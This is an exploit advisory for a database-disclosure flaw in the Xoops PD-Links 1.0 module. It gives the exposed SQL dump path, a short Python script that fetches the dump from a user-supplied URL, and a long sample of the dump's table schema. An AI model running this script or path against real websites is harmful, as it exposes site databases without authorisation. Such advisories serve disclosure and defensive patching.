Xoops 1.0.2 PD-Links Modules 1.0 Krobi Database Disclosure

1. ####################################################################
2.  
3. # Exploit Title : Xoops 1.0.2 PD-Links Modules 1.0 Krobi Database Disclosure
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 03/03/2019
7. # Vendor Homepage : xoops.org ~ power-dreams.com
8. # Software Download Link : xoops.org/modules/repository/visit.php?cid=40&lid=1491
9. # Software Information Link : xoops.org/modules/repository/singlefile.php?cid=40&lid=1491
10. # Software Version : 1.0
11. Compatible with Xoops 1.0.2 and 2.4.x
12. # Software Technical System Requirements :
13. Price: Free | Platform: 2.4.x | License: Sun Solaris Source Code
14. (Foundation Release) License (v. 1.1) | Limitations: None
15. # Tested On : Windows and Linux
16. # Category : WebApps
17. # Exploit Risk : Medium
18. # Vulnerability Type :
19. CWE-200 [ Information Exposure ]
20. CWE-538 [ File and Directory Information Exposure ]
21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
24. # Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability
25. acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
26. # Reference Link : cxsecurity.com/issue/WLB-2019030010
27.  
28. ####################################################################
29.  
30. # Description about Software :
31. ***************************
32. This Module is based on the WF-Downloads 2.05a Module. It is called PD-Links Modules.
33.  
34. This new features make it easier for you to administrate the module.
35.  
36. ####################################################################
37.  
38. # Impact :
39. ***********
40. * The product stores sensitive information in files or directories that are accessible
41.  
42. to actors outside of the intended control sphere.
43.  
44. * An information exposure is the intentional or unintentional disclosure of information
45.  
46. to an actor that is not explicitly authorized to have access to that information.
47.  
48. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
49.  
50. MySQL over the World Wide Web. It can be used to dump a database or a collection of
51.  
52. databases for backup or transfer to another SQL server (not necessarily a MySQL server).
53.  
54. The dump typically contains SQL statements to create the table, populate it, or both.
55.  
56. This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
57.  
58. should not be found on a production system.
59.  
60. ####################################################################
61.  
62. Direct Access =>
63. ***************
64. VULNERABLESITE/sql/PDlinks.sql
65.  
66. # Database Disclosure Information Exposure Exploit :
67. ***********************************************
68. #!/usr/bin/python
69. import string
70. import re
71. from urllib2 import Request, urlopen
72. disc = "/sql/PDlinks.sql"
73. url = raw_input ("URL: ")
74. req = Request(url+disc)
75. rta = urlopen(req)
76. print "Result"
77. html = rta.read()
78. rdo = str(re.findall("resources.*=*", html))
79. print rdo
80. exit
81.  
82. ####################################################################
83.  
84. # Example Information about SQL Dump File =>
85. ******************************************
86.  
87. # phpMyAdmin SQL Dump
88. # version 2.5.5-pl1
89. # http://www.phpmyadmin.net
90. #
91. # Host: localhost
92. # Generation Time: Jul 25, 2004 at 11:45 PM
93. # Server version: 3.23.56
94. # PHP Version: 4.3.4
95. #
96. # Database : `205test`
97. #
98.  
99. # --------------------------------------------------------
100.  
101. #
102. # Table structure for table `PDlinks_broken`
103. #
104.  
105. CREATE TABLE PDlinks_broken (
106. reportid int(5) NOT NULL auto_increment,
107. lid int(11) NOT NULL default '0',
108. sender int(11) NOT NULL default '0',
109. ip varchar(20) NOT NULL default '',
110. date varchar(11) NOT NULL default '0',
111. confirmed enum('0','1') NOT NULL default '0',
112. acknowledged enum('0','1') NOT NULL default '0',
113. PRIMARY KEY (reportid),
114. KEY lid (lid),
115. KEY sender (sender),
116. KEY ip (ip)
117. ) ENGINE=MyISAM;
118.  
119. #
120. # Dumping data for table `PDlinks_broken`
121. #
122.  
123.  
124. # --------------------------------------------------------
125.  
126. #
127. # Table structure for table `PDlinks_cat`
128. #
129.  
130. CREATE TABLE PDlinks_cat (
131. cid int(5) unsigned NOT NULL auto_increment,
132. pid int(5) unsigned NOT NULL default '0',
133. title varchar(50) NOT NULL default '',
134. imgurl varchar(150) NOT NULL default '',
135. description varchar(255) NOT NULL default '',
136. total int(11) NOT NULL default '0',
137. spotlighttop int(11) NOT NULL default '0',
138. spotlighthis int(11) NOT NULL default '0',
139. nohtml int(1) NOT NULL default '0',
140. nosmiley int(1) NOT NULL default '0',
141. noxcodes int(1) NOT NULL default '0',
142. noimages int(1) NOT NULL default '0',
143. nobreak int(1) NOT NULL default '1',
144. weight int(11) NOT NULL default '0',
145. PRIMARY KEY (cid),
146. KEY pid (pid)
147. ) ENGINE=MyISAM;
148.  
149. #
150. # Dumping data for table `PDlinks_cat`
151. #
152.  
153. # --------------------------------------------------------
154.  
155. #
156. # Table structure for table `PDlinks_links`
157. #
158.  
159. CREATE TABLE PDlinks_links (
160. lid int(11) unsigned NOT NULL auto_increment,
161. cid int(5) unsigned NOT NULL default '0',
162. title varchar(100) NOT NULL default '',
163. url varchar(255) NOT NULL default '',
164. screenshot varchar(255) NOT NULL default '',
165. submitter int(11) NOT NULL default '0',
166. publisher varchar(255) NOT NULL default '',
167. status tinyint(2) NOT NULL default '0',
168. date int(10) NOT NULL default '0',
169. hits int(11) unsigned NOT NULL default '0',
170. rating double(6,4) NOT NULL default '0.0000',
171. votes int(11) unsigned NOT NULL default '0',
172. comments int(11) unsigned NOT NULL default '0',
173. forumid int(11) NOT NULL default '0',
174. published int(11) NOT NULL default '1089662528',
175. expired int(10) NOT NULL default '0',
176. updated int(11) NOT NULL default '0',
177. offline tinyint(1) NOT NULL default '0',
178. description text NOT NULL,
179. ipaddress varchar(120) NOT NULL default '0',
180. notifypub int(1) NOT NULL default '0',
181. PRIMARY KEY (lid),
182. KEY cid (cid),
183. KEY status (status),
184. KEY title (title(40))
185. ) ENGINE=MyISAM;
186.  
187. #
188. # Dumping data for table `PDlinks_links`
189. #
190.  
191. # --------------------------------------------------------
192.  
193. #
194. # Table structure for table `PDlinks_indexpage`
195. #
196.  
197. CREATE TABLE PDlinks_indexpage (
198. indeximage varchar(255) NOT NULL default 'blank.png',
199. indexheading varchar(255) NOT NULL default 'PD-Links',
200. indexheader text NOT NULL,
201. indexfooter text NOT NULL,
202. nohtml tinyint(8) NOT NULL default '1',
203. nosmiley tinyint(8) NOT NULL default '1',
204. noxcodes tinyint(8) NOT NULL default '1',
205. noimages tinyint(8) NOT NULL default '1',
206. nobreak tinyint(4) NOT NULL default '0',
207. indexheaderalign varchar(25) NOT NULL default 'left',
208. indexfooteralign varchar(25) NOT NULL default 'center',
209. FULLTEXT KEY indexheading (indexheading),
210. FULLTEXT KEY indexheader (indexheader),
211. FULLTEXT KEY indexfooter (indexfooter)
212. ) ENGINE=MyISAM;
213.  
214. #
215. # Dumping data for table `PDlinks_indexpage`
216. #
217.  
218. INSERT INTO PDlinks_indexpage VALUES ('logo-en.gif', 'PD-Links', '<div><b>Welcome to the PD Links Section.</b></div>', 'PD-Links', 0, 0, 0, 0, 1, 'left', 'Center');
219.  
220. # --------------------------------------------------------
221.  
222.  
223. #
224. # Table structure for table `PDlinks_mod`
225. #
226.  
227. CREATE TABLE PDlinks_mod (
228. requestid int(11) NOT NULL auto_increment,
229. lid int(11) unsigned NOT NULL default '0',
230. cid int(5) unsigned NOT NULL default '0',
231. title varchar(255) NOT NULL default '',
232. url varchar(255) NOT NULL default '',
233. screenshot varchar(255) NOT NULL default '',
234. submitter int(11) NOT NULL default '0',
235. publisher text NOT NULL,
236. status tinyint(2) NOT NULL default '0',
237. date int(10) NOT NULL default '0',
238. hits int(11) unsigned NOT NULL default '0',
239. rating double(6,4) NOT NULL default '0.0000',
240. votes int(11) unsigned NOT NULL default '0',
241. comments int(11) unsigned NOT NULL default '0',
242. forumid int(11) NOT NULL default '0',
243. published int(10) NOT NULL default '0',
244. expired int(10) NOT NULL default '0',
245. updated int(11) NOT NULL default '0',
246. offline tinyint(1) NOT NULL default '0',
247. description text NOT NULL,
248. modifysubmitter int(11) NOT NULL default '0',
249. requestdate int(11) NOT NULL default '0',
250. PRIMARY KEY (requestid)
251. ) ENGINE=MyISAM;
252.  
253. #
254. # Dumping data for table `PDlinks_mod`
255. #
256.  
257. # --------------------------------------------------------
258.  
259.  
260. #
261. # Table structure for table `PDlinks_votedata`
262. #
263.  
264. CREATE TABLE PDlinks_votedata (
265. ratingid int(11) unsigned NOT NULL auto_increment,
266. lid int(11) unsigned NOT NULL default '0',
267. ratinguser int(11) NOT NULL default '0',
268. rating tinyint(3) unsigned NOT NULL default '0',
269. ratinghostname varchar(60) NOT NULL default '',
270. ratingtimestamp int(10) NOT NULL default '0',
271. PRIMARY KEY (ratingid),
272. KEY ratinguser (ratinguser),
273. KEY ratinghostname (ratinghostname),
274. KEY lid (lid)
275. ) ENGINE=MyISAM;
276.  
277. #
278. # Dumping data for table `PDlinks_votedata`
279. #
280.  
281. ####################################################################
282.  
283. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
284.  
285. ####################################################################